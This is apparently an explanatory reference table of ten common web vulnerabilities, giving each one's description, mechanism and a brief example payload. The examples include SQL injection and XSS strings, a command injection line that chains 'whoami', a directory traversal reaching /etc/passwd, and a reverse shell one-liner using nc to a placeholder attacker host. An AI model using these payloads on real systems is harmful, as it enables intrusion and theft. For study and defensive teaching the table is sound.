| SQL Injection (SQLi) |
Injects malicious SQL into input fields to manipulate DB queries |
Attacker modifies query to extract or manipulate data |
SELECT * FROM users WHERE id='1' OR '1'='1' |
| Cross-Site Scripting (XSS) |
Injects malicious scripts into web pages |
Scripts execute in the victim’s browser |
<script>alert('XSS')</script> |
| Cross-Site Request Forgery (CSRF) |
Forces users to execute unwanted actions |
Exploits authenticated sessions by tricking browser |
<img src="http://target/delete?user=1"> |
| Remote Code Execution (RCE) |
Executes attacker-controlled code on the server |
Input is passed directly to system functions |
; nc attacker.com 4444 -e /bin/bash |
| Directory Traversal |
Accesses files outside the web root |
Manipulates file paths using ../ |
/download?file=../../etc/passwd |
| File Upload Vulnerability |
Uploads malicious files to the server |
Server allows unsafe file types or paths |
Uploading shell.php and accessing it via URL |
| Command Injection |
Injects system commands through user input |
Input passed unsanitized to shell commands |
ping 127.0.0.1; whoami |
| Insecure Deserialization |
Executes code by deserializing untrusted input |
Malformed serialized objects trigger code execution |
Java/PHP object with injected payload |
| Broken Access Control |
Bypasses restrictions to access unauthorized data/functions |
Direct access to APIs/URLs without proper checks |
Accessing /admin without being admin |
| Server-Side Request Forgery (SSRF) |
Forces the server to make requests to internal services |
Input like URLs is used by the server to fetch resources |
http://localhost:8080/admin |